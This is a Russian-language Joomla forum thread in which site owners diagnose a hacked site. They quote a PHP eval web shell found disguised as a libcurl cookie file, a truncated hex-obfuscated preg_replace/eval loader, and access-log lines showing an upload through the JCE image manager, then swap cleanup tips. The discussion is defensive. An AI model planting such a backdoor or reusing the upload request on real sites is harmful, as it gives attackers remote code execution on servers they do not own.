Вирус на сайте, редирект, что делать как лечить! - страница 12 - Безопасность сайтов на Joomla

Привет.
Сегодня нашел /images/j.php:

Код

# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

125.253.118.88     FALSE     /about/     FALSE     0     <?eval(stripslashes(array_pop($_POST)))?>     1

Явно это гадость.
Я не силен в php, прокомментируйте, пжста, этот код.

гадость 100% Посмотри рядом еще jos_*** может быть.

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66
...
WC0t3F2M39Xd/ZkaHlfaAcdrrvp/397qNDdJoNJJGo9F
... и т.д.

Да, был такой, он и был в начале найден по содержимому:

Код

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66
...
WC0t3F2M39Xd/ZkaHlfaAcdrrvp/397qNDdJoNJJGo9F
... и т.д.

j.php или jos_*** интересно, кто из них был внедрён первым?

последняя фраза слегка пугает "настраивайте"
в мануале про удаление ничего по видимому рекомендуют ставить сверху

У кого то есть мысли по этому поводу?

Что сделал я на нескольких сайтах, после того как нашел в логах дырку:

9. Выставил права root на все папки и файлы, за исключением папок для изображений, товаров и т.п.
У кого то есть мысли по этому поводу?

вот логи заброса:
92.242.99.186 - - [06/May/2013:21:09:16 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.0" 200 74 "http://www.example.net" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

^{вот еще:
Line 21215: 125.253.118.88 - - [09/May/2013:19:49:13 +0400] "POST /index.php?nn_qp=1&url=http://www.nonumber.nl/ HTTP/1.0" 200 32306 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1) Gecko/20110403 Firefox/3.6a1pre"
Line 21216: 125.253.118.88 - - [09/May/2013:19:49:20 +0400] "POST /images/j.php HTTP/1.0" 404 1734 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1) Gecko/20110403 Firefox/3.6a1pre"}

Наверно пытаются взломать через старый фреймворк.

все разбор закончен nn_qp это не заброс это рассылка от разработчиков http://www.nonumber.nl/. что это оэначает? наверно -денег просят

PS. Господа! Пользовался кто-нить этим чудом: Core Design Captcha plugin ?? - допустим хоть тупо на авторизацию? Помогает? От того же брутфорса?

уважаемый dormidont! что дает отключение nonumber в плане функциональности?

Прочитал тему, почистил все js и php скрипты, поставил разрешение на админку только со своего  ип.